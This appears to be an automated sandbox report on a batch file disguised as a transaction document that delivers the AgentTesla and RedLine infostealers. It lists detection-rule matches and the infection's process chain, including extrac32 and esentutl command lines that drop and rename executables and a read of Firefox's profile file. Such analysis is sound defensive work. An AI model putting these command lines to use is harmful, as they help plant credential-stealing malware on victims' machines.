Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26ec0000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26b00b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 9.2.xrbjyllC.pif.299efca6.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.2212fca6.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.xrbjyllC.pif.26affca6.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 17.2.xrbjyllC.pif.22680000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2918780561.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 00000011.00000001.1996288631.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winBAT@25/11@3/3

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031C7FD4 GetDiskFreeSpaceA,

3_2_031C7FD4

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D6DC8 CoCreateInstance,

3_2_031D6DC8

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB06544.TMP

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	9_1_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_2_00413780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Command line argument: 08A	11_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\xrbjyllC.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Libraries\xrbjyllC.pif

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: z1Transaction_ID_REF2418_cmd.bat

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Cllyjbrx.PIF "C:\Users\Public\Libraries\Cllyjbrx.PIF"
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o	Jump to behavior
